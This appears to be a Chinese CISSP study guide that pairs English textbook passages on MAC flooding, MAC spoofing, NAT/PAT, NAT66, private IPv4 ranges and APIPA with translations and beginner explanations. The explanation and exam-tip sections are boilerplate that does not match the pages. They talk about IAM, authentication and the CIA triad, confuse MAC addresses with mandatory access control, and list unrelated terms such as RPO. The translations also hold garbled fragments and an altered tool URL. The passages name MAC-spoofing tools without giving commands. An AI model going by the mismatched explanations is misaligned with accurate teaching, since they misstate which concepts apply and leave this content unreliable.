ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 48 / PDF P885

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

MAC flooding is distinct from ARP poisoning and other types of AitM attacks in that the attacker does not get into the path of the communication between client and server; instead, the attacker (as well as everyone else on the local network) gets a copy of the communication. At this point, the attacker can eavesdrop on any communications taking place across the compromised switch. A defense against MAC flooding is often present on managed switches. The feature, known as MAC limiting, restricts the number of MAC addresses that will be accepted into the CAM table from each jack/port.

A network intrusion detection system (NIDS) may also be useful in identifying when a MAC flooding attack is attempted. MAC Cloning No two devices can have the same MAC address in the same local Ethernet broadcast domain; otherwise, an address conflict occurs. It is also good practice to verify that all MAC addresses across a private enterprise network are unique. This can be accomplished through manual NIC configuration checks as well as by remote queries performed by network discovery scanners. Although the design of MAC addresses should make them unique, vendor errors have produced duplicate MAC addresses.

When this happens, either the NIC hardware must be replaced, or the MAC address must be modified (i.e., spoofed) to a nonconflicting alternative address. An adversary may eavesdrop on a network and take note of the MAC addresses in use. One of these addresses can then be spoofed into a system by altering the system's software copy of the NIC's MAC. This causes the Ethernet driver to operate based on the modified or spoofed MAC address instead of the original manufacturer's assigned MAC. Thus, it is quite simple to falsify, spoof, or clone a MAC address. MAC spoofing is the changing of the default MAC address to some other value.

MAC cloning is used to impersonate another system, often a valid or authorized network device, to bypass port security or MAC filtering limitations. MAC filtering is a security mechanism intended to limit or restrict network access to those devices with known specific MAC addresses. MAC filtering is commonly used on WAPs and switches. Countermeasures to MAC spoofing/cloning include the following: MAC

中文直译 / 整理

泛洪与 ARP 欺骗及其他类型的中间人攻击不同,攻击者并未介入客户端 与服务器之间的通信路径; 相反,攻击者(以及本地网络上的其他人)都会获 得通信的副本。 此时,攻击者可以窃听通过被攻陷交换机进行的任何通信。 在受管交换机上通常存在针对MAC泛洪的防御措施。 该功能称为MAC限制, 它限制了从每个接口/端口进入CAM表的MAC地址数量。 网络入侵检测系统 (NIDS)也可能有助于识别MAC泛洪攻击的尝试。 MAC克隆 在同一本地以太网广播域中,不允许两个设备拥有相同的MAC地址; 否则将 发生地址冲突。 此外,验证私有企业网络中所有MAC地址的唯一性也是一种 良好实践。 这可以通过手动检查网卡配置以及通过网络发现扫描器执行远程查 询来实现。 尽管MAC地址的设计本应确保其唯一性,但厂商错误仍可能导致 MAC地址重复。 一旦发生这种情况,要么必须更换网卡硬件,要么必须修改 (即欺骗)MAC地址为一个不冲突的替代地址。 攻击者可能监听网络并记录正在使用的MAC地址。 然后,可以通过修改系统中 网卡MAC地址的软件副本,将其中一个地址欺骗至系统中。

这将导致以太网驱 动程序基于修改后或欺骗的MAC地址运行,而非原始制造商分配的MAC地址。 因此,伪造、欺骗或克隆MAC地址非常简单。 MAC地址欺骗是将默认的MAC地址更改为其他值。 MAC克隆用于伪装成另一 个系统,通常是合法或授权的网络设备,以绕过端口安全或MAC过滤限制。 MAC过滤是一种安全机制,旨在将网络访问限制为仅限具有已知特定MAC地 址的设备。 MAC过滤通常用于无线接入点和交换机。 针对MAC地址欺骗/克隆的对策包括以下内容:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

检测是 IDS,主动阻断更像 IPS。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 49 / PDF P886

第 886 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Using intelligent switches that monitor for odd MAC address uses and abuses Using an NIDS that monitors for odd MAC address uses and abuses Maintaining an inventory of devices and their MAC addresses to confirm whether a device is authorized or unknown and rogue To spoof a MAC address on *nix systems, you can use the utility macchanger. On Windows, use the free tools of Technitium from http://technitium.com/tmac or the SMAC Tool from http://smactool.com.

Network Address Translation The goals of hiding the identity of internal clients, masking the design of your private network, and keeping public IPv4 address leasing costs to a minimum are all simple to achieve through the use of network address translation (NAT). NAT hides the IPv4 configuration of internal clients and substitutes the IPv4 configuration of the proxy server's own public external NIC in outbound requests. This effectively prevents external hosts from learning the internal configuration of the network. This is an essential function when using RFC 1918 (Address Allocation for Private Internets) private IPv4 addresses internally while communicating with Internet resources.

NAT was developed to allow private networks to use any IPv4 address set without causing collisions or conflicts with public Internet hosts with the same IPv4 addresses. In effect, NAT translates the IPv4 addresses of your internal clients to leased addresses outside your environment. Functionally, NAT is a form of virtualized network; it hides or masks the real network configuration behind its own public identity. NAT offers numerous benefits, including the following: You can connect an entire network to the Internet using only a single (or just a few) leased public IPv4 addresses.

You can use the private IPv4 addresses defined in RFC 1918 in a private network and still be able to communicate with the Internet.

中文直译 / 整理

使用智能交换机监控异常的MAC地址使用行为 使用一种监控异常MAC地址使用和滥用的NIDS 维护设备及其MAC地址的清单,以确认设备是授权的、未知的还是恶意的 在*nix系统上伪造MAC地址,可以使用工具macchanger。 在Windows上, 可使用Technitium提供的免费工具,地址为http://technitium.com/tmac,或 使用SMAC工具,地址为http://smac-tool.com。 网络地址转换 通过使用网络地址转换(NAT),可以轻松实现隐藏内部客户端身份、掩盖私 有网络结构以及将公共IPv4地址租赁成本降至最低的目标。 NAT会隐藏内部客 户端的IPv4配置,并在出站请求中替换为代理服务器自身的公共外部网卡的 IPv4配置。 这有效地防止了外部主机获取网络的内部配置。 当在内部使用 RFC 1918(私有互联网地址分配)的私有IPv4地址并与互联网资源通信时,这 是至关重要的功能。 NAT 是为了使私有网络能够使用任意 IPv4 地址集,而不会与具有相同 I Pv4 地址的公共互联网主机发生冲突或冲突而开发的。

实际上,NAT 将您内 部客户端的 IPv4 地址转换为您环境外部的租赁地址。 从功能上讲,NAT 是 一种虚拟化网络形式; 它隐藏或掩盖了其自身公共身份背后的真实网络配置。 NAT 提供了许多优势,包括以下几点: 您可以仅使用一个(或少数几个)租赁的公共 IPv4 地址将整个网络连接到互 联网。 您可以在私有网络中使用 RFC 1918 中定义的私有 IPv4 地址,并仍能与互联网通信。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

身份:身份是主体在系统中的标识。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 886 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

检测是 IDS,主动阻断更像 IPS。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 50 / PDF P887

第 887 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

NAT hides the IPv4 addressing scheme and network topography from the Internet. NAT restricts connections so that only traffic stemming from connections originating from the internal protected network is allowed back into the network from the Internet. Thus, most intrusion attacks are automatically repelled. NAT serves as a basic one-way firewall by only allowing incoming traffic that is in response to an internal system's request. Are You Using NAT? Most networks, whether at an office or at home, employ NAT. There are at least three ways to tell whether you are working within a “NATed” network: Check your client's IPv4 address.

If it is one of the RFC 1918 addresses and you are still able to interact with the Internet, then you are on a NATed network. Check the configuration of your proxy, router, firewall, modem, or gateway device to see whether NAT is configured. (This action requires authority and access to the networking device.) If your client's IPv4 address is not an RFC 1918 address, then compare your address to what the Internet thinks your address is. You can do this by visiting any of the IP-checking websites; a popular one is http://whatismyipaddress.com.

If your client's IPv4 address and the address that What Is My IP Address claims is your address are different, then you are working from a NATed network. NAT is part of a number of hardware devices and software products, including firewalls, routers, gateways, WAPs, and proxies. Strictly, NAT dynamically converts or maps the private IPv4 addresses of internal systems found in the header of network packets into public or external IPv4 addresses. NAT performs this operation on a one-to-one basis; thus, a single leased public IPv4 address can allow a single internal system to access the Internet. Closely related to NAT is port address translation (PAT) NAT

中文直译 / 整理

隐藏了 IPv4 地址方案和网络拓扑结构,使其不被 互联网。 NAT 限制连接,仅允许源自 源自内部保护网络的连接才被允许从互联网返回网络。 因此,大多数入侵攻击 会被自动阻止。 NAT 通过仅允许对内部系统请求作出响应的入站流量,充当基本的单向防火 墙。 您是否在使用 NAT? 大多数网络,无论是办公室还是家庭网络,都使用NAT。 判断您是否处 于“NAT”网络中有至少三种方法: 检查客户端的IPv4地址。 如果它是RFC 1918地址之一,而您仍能 与互联网交互,则您处于NAT网络中。 检查您的代理、路由器、防火墙、调制解调器或网关设备的配置,以查看 是否已配置NAT。 (此操作 需要对网络设备具有权限和访问权限。 ) 如果您的客户端IPv4地址不是RFC 1918地址,则 pare y将您的地址与互联网所认为的地址进行比较 y我们的地址是。 您可以通过访问任何IP检查网站来实现这一点; 一个常用的网站是 http://whatismyipaddress.com。 如果您的客户端IPv4地址与What Is My IP Address声称的地址不同,则您正在使用NAT网络。

NAT是多种硬件设备和软件产品的一部分,包括防火墙、路由器、网关、WAP和代 理。 严格来说,NAT 会动态将网络数据包头部中内部系统的私有 IPv4 地址转换或 映射为公有或外部 IPv4 地址。 NAT 以一对一的方式执行此操作; 因此,一个 租用的公有 IPv4 地址可允许单个内部系统访问互联网。 与 NAT 密切相关的是 端口地址转换( PAT )

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 887 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
防火墙 防火墙根据规则控制网络流量进出。
学习单元 51 / PDF P888

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

—also known as overloaded NAT, network and port address translation (NPAT), and network address port translation (NAPT)—which allows a single public IPv4 address to host up to 65,536 simultaneous communications from internal clients (a theoretical maximum; in practice, you should limit the number to 4,000 or fewer in most cases due to hardware limitations). Instead of mapping IPv4 addresses on a one-to-one basis, PAT uses the Transport Layer port numbers to host multiple simultaneous communications across each public IPv4 address by mapping internal sockets (i.e., the combination of an IPv4 address and a port number) to external sockets.

PAT is effectively multiplexing numerous sessions from internal systems over a single external IPv4 address. So, with NAT, you must lease as many public IPv4 addresses as you want to have simultaneous communications, whereas with PAT you can lease significantly fewer IPv4 addresses. The use of the term NAT in the IT industry has come to include the concept of PAT. Thus, when you hear or read about NAT, you can assume that the material is referring to PAT. This is true for most OSs, devices, and services. Source Network Address Translation (SNAT) is yet another term for NAT.

NAT can also be called Stateful NAT or Dynamic NAT since the mapping and IPv4 address or socket allocation is created when a session is initiated and dissolved when the session is torn down (see the section “Stateful NAT,” later in this chapter). From this point forward, our use of the term NAT is meant to imply the more likely use of PAT. Another issue to be familiar with is that of NAT traversal (NAT-T) (RFC 3947). Traditional NAT doesn't support IPSec VPNs, because of the requirements of the IPSec protocol and the changes NAT makes to packet headers (which is perceived as corruption or violating integrity).

However, NAT-T was designed specifically to support IPSec and other tunneling VPN protocols, such as Layer 2 Tunneling Protocol (L2TP), so that organizations can benefit from both NAT and VPNs across the same border device/interface. Although NAT by default is a dynamic outbound mapping mechanism, it can be configured to perform inbound mapping as well. Known as static NAT, reverse proxy, port forwarding, or destination network address translation (DNAT), this technique allows an external entity to initiate communication with an internal entity behind a NAT by using a public socket that is mapped to redirect to an internal system's private address.

Though this is technically possible, it is generally to be avoided. Granting the easy ability for an external entity to initiate a connection with an internal system is not usually a secure ——

中文直译 / 整理

也称为 超载NAT、网络和端口地址转换(NPAT) 以及 网络地址端口转换 (NAPT)——它允许单个公有 IPv4 地址承载多达 65,536 个来自内部客户端的 同时通信(理论最大值; 由于硬件限制,实践中大多数情况下应将数量限制在 4,000 个或更少)。 PAT 不再以一对一的方式映射 IPv4 地址,而是利用传输层 端口号,通过将内部套接字(即 IPv4 地址与端口号的组合)映射到外部套接字, 从而在每个公有 IPv4 地址上支持多个同时通信。 PAT 实质上是在单个外部 IPv4 地址上对多个内部系统的会话进行多路复用。 因此,使用 NAT 时,您需 要租赁与所需同时通信数量相等的公有 IPv4 地址; 而使用 PAT 时,您只需租 赁少得多的 IPv4 地址。 在IT行业中,术语NAT的使用已包含PAT的概念。 因此,当您听到或读到 NAT时,可以假设所涉及的内容是指PAT。 这一情况适用于大多数操作系统、 设备和服务。 源网络地址转换(SNAT)是NAT的另一个术语。

NAT也可以称 为有状态NAT或动态NAT,因为映射和IPv4地址或套接字分配是在会话启动时 创建,并在会话终止时解除(参见本章后面的“有状态NAT”部分)。 从现在 起,我们使用术语NAT时,意在暗示更可能使用PAT。 另一个需要熟悉的问题是NAT穿越(NAT-T)(RFC 3947)。 传统NAT不 支持IPSec VPN,这是因为IPSec协议的要求以及NAT对数据包头部所做的 更改(这会被视为损坏或破坏完整性)。 然而,NAT‑T是专门为支持IPSec 和其他隧道VPN协议(如第二层隧道协议(L2TP))而设计的,以便组织能 够通过同一边界设备/接口同时受益于NAT和VPN。 尽管默认情况下NAT是一种动态出站映射机制,但也可以配置为执行入站映射。 这种技术被称为静态NAT、反向代理、端口转发或目标网络地址转换(D NAT),它允许外部实体通过一个映射到内部系统私有地址的公共套接字发起 与NAT后内部实体的通信。 尽管技术上可行,但通常应避免使用。 使外部实体 能够轻松发起与内部系统的连接通常并不安全

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 52 / PDF P889

第 889 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

solution. Static NAT may be useful for systems in a screened subnet or extranet, but definitely not for accessing systems in the internal private LAN. NAT66, or Network Address Translation for IPv6, is a technique used to map multiple private IPv6 addresses to a smaller pool of public IPv6 addresses. The primary goal of NAT66 is similar to traditional NAT used in IPv4 networks, which is to enable multiple devices within a private network to share a single or a limited set of globally routable IPv6 addresses. NAT66 allows multiple devices within a private IPv6 network to share the same public IPv6 address when communicating with external networks, such as the Internet.

NAT66 provides a level of privacy and security by hiding internal network details from external entities. It assigns global IPv6 addresses to devices within the private network, and external entities see only the public IPv6 address. Although IPv6 has a vastly larger address space compared to IPv4, there may still be scenarios where organizations want to conserve public IPv6 addresses. NAT66 can be used to achieve this goal by allowing multiple internal devices to share a common public IPv6 address.

It's important to note that while NAT66 is an option, IPv6 was originally designed with the goal of providing globally unique addresses to all devices, promoting end-to-end connectivity without the need for address translation. The use of NAT in IPv6 has been a topic of debate, and some advocate for maintaining the original design principles of IPv6. However, in certain deployment scenarios or due to specific network requirements, organizations may choose to implement NAT66 for address conservation and security purposes. Private IP Addresses The world has simply deployed more devices using IPv4 than there are unique IPv4 addresses available.

Fortunately, the early designers of the Internet and TCP/IP had good foresight and put aside a few blocks of addresses for private, unrestricted use. These IPv4 addresses, commonly called the private IPv4 addresses, are defined in RFC 1918. They are as follows: 10.0.0.0–10.255.255.255 (a full Class A range) 172.16.0.0–172.31.255.255 (16 Class B ranges) 192.168.0.0–192.168.255.255 (256 Class C ranges)

中文直译 / 整理

解决方案。 静态NAT可能对筛选子网或外联网中的系统有用,但绝对不适用于访 问内部私有局域网中的系统。 NAT66,即IPv6网络地址转换,是一种将多个私有IPv6地址映射到较小公共 IPv6地址池的技术。 NAT66的主要目标与IPv4网络中使用的传统NAT类似, 即允许私有网络内的多个设备共享一个或一组可全局路由的IPv6地址。 当私有IPv6网络中的多个设备与外部网络(如互联网)通信时,NAT66允许它 们共享同一个公共IPv6地址。 NAT66通过隐藏内部网络细节,为外部实体提供 了一定程度的隐私和安全性。 它为私有网络内的设备分配全球IPv6地址,而外 部实体只能看到公共IPv6地址。 尽管IPv6的地址空间远大于IPv4,但仍可能存 在组织希望节约公共IPv6地址的场景。 NAT66可通过允许多个内部设备共享一 个公共IPv6地址来实现这一目标。 需要注意的是,尽管NAT66是一种选择,但IPv6最初的设计目标是为所有设备 提供全局唯一的地址,从而实现无需地址转换的端到端连接。 IPv6中使用 NAT一直是一个有争议的话题,一些人主张维护IPv6的原始设计原则。

然而, 在某些部署场景或由于特定网络需求的情况下,组织可能会选择实施NAT66以 实现地址节约和安全目的。 私有IP地址 世界上部署的IPv4设备数量已超过可用的唯一IPv4地址总数。 幸运的是, 互联网和TCP/IP的早期设计者具有远见,预留了一些地址块用于私有、 无限制的使用。 这些IPv4地址通常称为私有IPv4地址,其定义见RFC 1918。 具体如下: 10.0.0.0–10.255.255.255(一个完整的A类地址范围) 172.16.0.0–172.31.255.255(16个B类地址范围) 192.168.0.0–192.168.255.255(256个C类网段)

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 889 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

考试常让你把协议、端口、层次对应起来。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 53 / PDF P890

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Can't NAT Again On several occasions we've needed to “re-NAT” an already “NATed” network. This might occur in the following situations: You need to make an isolated subnet within a NATed network and attempt to do so by connecting a router to host your new subnet to the single port offered by the existing network. You have a DSL or cable modem that offers only a single connection but you have multiple computers or want to add wireless to your environment. By connecting a NAT proxy router or a wireless access point, you are usually attempting to re-NAT what was NATed to you initially. One configuration setting that can either make or break this setup is the IPv4 address range in use.

It is not possible to re-NAT the same subnet. For example, if your existing network is offering 192.168.1.x addresses, then you cannot use that same address range in your new NATed subnet. So change the configuration of your new router/WAP to perform NAT on a slightly different address range, such as 192.168.5.x, and you won't have the conflict. This seems obvious, but it is quite frustrating to troubleshoot the unwanted result without this insight. All routers and traffic-directing devices are configured by default not to forward traffic to or from these private IPv4 addresses. In other words, the private IPv4 addresses are not routed by default.

Thus, they cannot be directly used to communicate over the Internet. However, they can be easily used on private networks where routers are not employed or where slight modifications to router configurations are made. Using private IPv4 addresses in conjunction with NAT greatly reduces the cost of connecting to the Internet by allowing fewer public IPv4 addresses to be leased from an ISP.

中文直译 / 整理

无法再次NAT 在多次情况下,我们需要对已NAT的网络进行“重新NAT”。 这种情况 可能发生在以下情形中: 您需要在一个已NAT的网络内创建一个隔离的子网,并尝试通过连接路由 器来托管您的新子网 现有网络提供的单个端口。 您拥有的DSL或电缆调制解调器仅提供单个连接,但您有多个计算机, 或希望在环境中添加无线功能。 通过连接NAT代理路由器或无线接入点,您通常试图对最初分配给您的 NAT网络再次进行NAT。 其中一个可能决定此设置成败的配置项是正在使 用的IPv4地址范围。 无法对同一子网进行重新NAT。 例如,如果您的现有 网络提供的是192.168.1.x地址,则您不能在新的NAT子网中使用相同的地 址范围。 因此,请将您的新路由器/WAP配置为在稍有不同的地址范围(如 192.168.5.x)上执行NAT,即可避免冲突。 这看起来显而易见,但若缺乏 这一洞察,排查由此产生的意外问题会非常令人沮丧。 默认情况下,所有路由器和流量导向设备均不会转发来自或去往这些私有I Pv4地址的流量。 换句话说,私有IPv4地址默认不会被路由。 因此,它们无法 直接用于通过互联网进行通信。

然而,在未使用路由器的私有网络中,或对路 由器配置进行轻微修改的网络中,可以轻松使用这些地址。 结合NAT使用私有 IPv4地址可以显著降低连接互联网的成本,因为只需从ISP租用较少的公有 IPv4地址即可。

小白解释

场景先行:你是公司的安全负责人,正在读第 890 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
学习单元 54 / PDF P891

第 891 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Attempting to use the RFC 1918 private IPv4 addresses directly on the Internet is futile because all publicly accessible routers will drop data packets containing a source IPv4 address from these RFC 1918 ranges. Stateful NAT NAT operates by maintaining a mapping between requests made by internal clients, a client's internal IP address, and the IP address of the Internet service contacted. When a request packet is received by NAT from a client, it changes the source address in the packet from the client's to the NAT server's. This change is recorded in the NAT mapping database along with the destination address.

Once a reply is received from the Internet server, NAT matches the reply's source address to an address stored in its mapping database and then uses the linked client address to redirect the response packet to its intended destination. This process is known as stateful NAT because it maintains information about the communication sessions between clients and external systems. Automatic Private IP Addressing Automatic Private IP Addressing (APIPA), also known as IPv4 link-local address assignment (defined in RFC 3927), assigns an IP address to a system in the event of a Dynamic Host Configuration Protocol (DHCP) assignment failure.

APIPA is primarily a feature of Windows, since no other OS has adopted the standard. APIPA assigns each failed DHCP client an IP address from the range of 169.254.0.1 to 169.254.255.254, along with the default Class B subnet mask of 255.255.0.0. This allows the system to communicate only with other APIPA-configured clients within the same broadcast domain but not with any system across a router or with a correctly assigned IP address. Don't confuse APIPA with the private IP address ranges defined in RFC 1918.

中文直译 / 整理

在互联网上直接使用RFC 1918私有IPv4地址是徒劳的,因为所有可公 开访问的路由器都会丢弃源IPv4地址属于这些RFC 1918范围的数据包。 有状态NAT NAT通过维护内部客户端请求、客户端内部IP地址与所访问的互联网服务IP地 址之间的映射来运行。 当NAT从客户端接收请求数据包时,它会将数据包中的 源地址从客户端地址更改为NAT服务器地址。 此更改会连同目标地址一起记录 在NAT映射数据库中。 一旦从互联网服务器收到回复,NAT会将回复的源地址 与其映射数据库中存储的地址进行匹配,然后使用关联的客户端地址将响应数 据包重定向到其预期目的地。 此过程称为有状态NAT,因为它维护了客户端与 外部系统之间通信会话的信息。 自动专用IP地址分配 自动专用IP地址分配(APIPA),也称为IPv4链路本地地址分配(由RFC 3927定义),在动态主机配置协议(DHCP)分配失败时为系统分配IP地址。 APIPA主要是Windows的特性,因为其他操作系统均未采用该标准。

APIPA 为每个DHCP分配失败的客户端分配一个从169.254.0.1到169.254.255.254范 围内的IP地址,以及默认的Class B子网掩码255.255.0.0。 这使得系统仅能与 同一广播域内其他已配置APIPA的客户端通信,而无法与路由器另一侧的系统 或已正确分配IP地址的系统通信。 不要将APIPA与RFC 1918中定义的私有IP地址范围混淆。

小白解释

场景先行:你是公司的安全负责人,正在读第 891 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

